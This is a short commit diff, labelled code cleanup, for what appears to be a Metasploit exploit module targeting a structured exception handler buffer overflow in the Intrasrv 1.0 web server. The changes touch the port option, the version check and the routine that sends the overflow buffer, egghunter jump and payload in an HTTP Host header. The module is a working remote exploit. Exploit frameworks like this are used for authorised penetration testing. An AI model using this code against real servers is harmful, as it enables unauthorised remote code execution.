Code cleanup

Author: neinwechter

modules/exploits/windows/http/intrasrv_bof.rb

@@ -58,6 +58,11 @@ def initialize(info={})
 			'Privileged'     => false,
 			'DisclosureDate' => "May 30 2013",
 			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 80])
+				], self.class)
 	end
 
 	def check
@@ -68,7 +73,7 @@ def check
 			return Exploit::CheckCode::Safe
 		end
 		sock.put("GET / HTTP/1.0\r\n")
-		res = sock.get
+		res = sock.get_once
 
 		if res =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
@@ -90,18 +95,16 @@ def exploit
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
-		# Setup payload
-		shellcode = egg
-		# second last byte of payload gets corrupted - pad 2 bytes
+		# second last byte of payload/egg gets corrupted - pad 2 bytes
 		# so we don't corrupt the actual payload
-		shellcode << rand_text(2)
+		egg << rand_text(2)
 
 		print_status("Sending buffer...")
 		# Payload location is an issue, so we're using the tcp mixin
 		# instead of HttpClient here to maximize control over what's sent.
 		# (i.e. no additional headers to mess with the stack)
 		connect
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}")
 		disconnect
 	end
 end